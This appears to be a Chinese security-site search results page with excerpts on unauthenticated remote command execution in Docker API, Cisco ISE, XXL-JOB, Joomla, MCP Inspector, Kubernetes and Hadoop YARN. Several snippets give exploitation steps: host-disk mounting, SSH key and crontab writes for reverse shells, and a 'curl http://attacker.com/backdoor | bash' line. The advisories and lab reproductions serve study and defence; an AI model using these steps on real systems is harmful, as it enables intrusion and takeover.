首页
学习
活动
专区
圈层
工具
发布

Docker API未授权命令执行

Docker Swarm使用标准的Docker API通过2375端口来管理每个Docker节点,Docker API是一个取代远程命令行界面(RCLI)的REST API。...当Docker节点的2375端口直接暴露并未做权限检查时,存在未授权访问漏洞,攻击者可以利用Docker API执行任何操作,包括执行Docker命令,创建、删除Docker以及获得宿主机权限等。...漏洞复现 访问目标的2375端口如下接口,若有信息,则存在Docker API未授权访问 http://x.x.x.x:2375/version http://x.x.x.x:2375/images http...我们可以执行如下命令启动一个未开启的容器,然后将宿主机的磁盘挂载到容器中。...chroot /opt bash#然后就可以执行如下一些命令,但是查看的ip和反弹shell等一些命令,还是容器内的historycat /etc/passwd 写入SSH公钥 执行如下命令将本地的authorized_keys

2.9K20

【漏洞通报】Cisco ISE API 未授权远程代码执行漏洞

漏洞情况近期,火山信安实验室监测发现, Cisco Identity Services Engine (ISE) 的 REST API 接口存在高危安全漏洞(CVE-2025-20281,CVSS v3.1...该漏洞源于 ISE 未对特定 API 端点实施身份验证和授权检查,攻击者无需任何凭证即可通过构造恶意 HTTP 请求,直接在受影响设备上执行任意操作系统命令,导致完全系统控制。...0x01漏洞利用方式攻击者可通过向 CSE ISE 管理接口的未公开 API 端点(如 /ers/config/networkdevice/ 或 /admin/API/mnt/Session/,具体路径需结合实际环境探测...或分号拼接 ; 实现无交互执行);一旦命令触发,攻击者可进一步利用该漏洞下载并执行恶意二进制文件(例如通过 curl http://attacker.com/backdoor | bash 植入后门),...Cisco ISE 3.2.2 及以上启用 Cisco ISE 多因素认证(MFA),强制管理员使用硬件令牌或生物识别登录定期审计 ISE 日志(/var/log/ise/ers.log),监控异常 API

25010
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    漏洞研究(7):XXL-JOB执行器未授权访问漏洞(RESTful API)

    原理与危害 调度中心使用RESTful API对执行器进行调度通信时,可以使用accessToken向执行器证明自己的身份。...如果没有配置accessToken,任何人都能对执行器发起调度通信,对执行器所在的服务器进行任意命令执行,从而获得执行器所在服务器的权限。 3....加固措施 可参考XXL-JOB作者恨铁不成钢的防护建议:XXL JOB 未授权访问致远程命令执行 "漏洞" 声明 5.1 开启身份认证 配置accessToken,开启身份认证,调度中心和执行器的值需保持一致...xxl-job-executor-samples/xxl-job-executor-sample-springboot/target/xxl-job-executor-sample-springboot-2.2.0.jar 再次对执行器进行未授权任意代码执行...CentOS中) yum install iptables-services -y && service iptables save && systemctl enable iptables 再次对执行器进行未授权任意代码执行

    3.9K10

    Docker API未授权漏洞复现

    ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}}) 这里将shell弹到kali上 当这个脚本在mac上执行完成之后...05 实战 这里来模拟测试开启Docker API未授权之后,使用密钥登陆受害者机器 5.1 配置Docker支持远程访问 在这里使用我自己的阿里云主机进行测试 首先要配置docker支持远程访问 进行文件备份...保存并退出编辑后,重载守护进程以及重启Docker: sudo systemctl daemon-reload sudo service docker restart 通过执行命令查看是否开放了远程访问端口...5.2 写入密钥 以下我将vps地址用127.0.0.1进行了替换 在本地执行命令: 查看远程vps的镜像 docker -H tcp://127.0.0.1:2375 images ?...5.3 关闭Docker API未授权 将我们的authorized_keys文件删除,将原来的文件复位 rm authorized_keys mv authorized_keys.bak authorized_keys

    4.5K20

    Docker API 未授权访问漏洞复现

    0x01 漏洞简介 该未授权访问漏洞是因为Docker API可以执行Docker命令,该接口是目的是取代Docker命令界面,通过URL操作Docker。...Docker API 未授权访问漏洞分析和利用 0x02 环境准备 靶机环境:192.168.126.130 (ubuntu) 攻击环境:192.168.126.128 (kali) 在靶机上使用vulhub...unauthorized-rce docker-compose build docker-compose up -d 0x03 漏洞检测 直接输入地址 http://your-ip:2375/version ;若能访问,证明存在未授权访问漏洞...> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}}) 然后执行...python docker-hack.py 如果kali上运行脚本报错:No module named ssl_match_hostname,可以查看这篇文章解决 执行完脚本,耐心等待一会才会反弹

    3.4K50

    Joomla未授权访问漏洞到代码执行

    CMS中的一个未授权访问漏洞(CVE-2023-23752),目前该漏洞的细节及PoC/EXP已公开。 漏洞介绍 在 Joomla!...CMS 版本4.0.0-4.2.7中 由于对web 服务端点访问限制不当,可能导致未授权访问Rest API,造成敏感信息泄露(如数据库账号密码等)。...未授权路径在: /api/index.php/v1/config/application?public=true 我们可以直接看到数据库的配置信息。...text.txt即可,自用写死了 结果会生成result.txt在目录下: 结果是写入的漏洞地址: 但这里推荐一款使用python编写的验证工具,也可以批量验证该漏洞 工具下载地址,见文章底部 代码执行思路...使用未_绑定_到127.0.0.1. Censys 显示了数千个 Joomla! 服务器与暴露的 MySQL 服务器位于同一位置。

    1.4K10

    MCP Inspector 未授权访问致代码执行漏洞

    漏洞情况近期,火山信安实验室监测发现,MCP Inspector 作为一款用于监控和管理系统的工具,存在未授权访问漏洞,攻击者无需提供有效的身份验证凭据,便可直接访问系统中的特定功能或接口;鉴于 MCP... Inspector 可能与系统底层代码或关键配置存在交互,未授权访问极有可能致使攻击者执行恶意代码,进而完全掌控受影响的系统,而此类漏洞通常是由身份验证机制不完善、访问控制策略配置错误或者系统设计缺陷等因素引发的...0x01漏洞利用方式攻击者通过使用自动化工具扫描目标网络,寻找存在 MCP Inspector 未授权访问漏洞的系统。...利用未授权访问权限,攻击者可以上传恶意代码或执行系统命令,从而控制受影响的系统,在控制一台系统后,攻击者可能会尝试利用该系统作为跳板,进一步攻击网络中的其他系统。...确保系统能够在第一时间获取并安装安全更新考虑采用多因素认证方式,如短信验证码、令牌等,增加攻击者获取访问权限的难度将 MCP Inspector 部署在独立的网络分段中,与其他关键系统进行隔离配置防火墙规则,阻止来自外部网络的未授权访问请求来源自

    29410

    云上攻防-云原生篇&Kubernetes&K8s安全&API&Kubelet未授权访问&容器执行

    也打开了新的入侵路径,例如: 1、通过虚拟机攻击云管理平台,利用管理平台控制所有机器 2、通过容器进行逃逸,从而控制宿主机以及横向渗透到K8s Master节点控制所有容器 3、利用KVM-QEMU/执行逃逸获取宿主机...Server未授权访问&kubelet未授权访问复现 k8s集群环境搭建 搭建环境使用3台Centos 7,参考: https://www.jianshu.com/p/25c01cae990c https...Server未授权访问 旧版本的k8s的API Server默认会开启两个端口:8080和6443。...-连接判断pods kubectl --insecure-skip-tls-verify -s https://10.10.10.167:6443 get pods 用户名密码随便输 -连接执行...namespace default pod whgojp container test-container -执行模版: curl -XPOST -k "https://10.10.10.170

    62310

    Hadoop Yarn REST API未授权漏洞利用挖矿分析

    一、背景情况 5月5日腾讯云安全曾针对攻击者利用Hadoop Yarn资源管理系统REST API未授权漏洞对服务器进行攻击,攻击者可以在未授权的情况下远程执行代码的安全问题进行预警,在预警的前后我们曾多次捕获相关的攻击案例...简单的说,用户可以向YARN提交特定应用程序进行执行,其中就允许执行相关包含系统命令。...YARN提供有默认开放在8088和8090的REST API(默认前者)允许用户直接通过API进行相关的应用创建、任务提交执行等操作,如果配置不当,REST API将会开放在公网导致未授权访问的问题,那么任何黑客则就均可利用其进行远程命令执行...更多漏洞详情可以参考 http://bbs.qcloud.com/thread-50090-1-1.html 三、入侵分析 在本次分析的案例中,受害机器部署有Hadoop YARN,并且存在未授权访问的安全问题...,黑客直接利用开放在8088的REST API提交执行命令,来实现在服务器内下载执行.sh脚本,从而再进一步下载启动挖矿程序达到挖矿的目的。

    4.9K60
    领券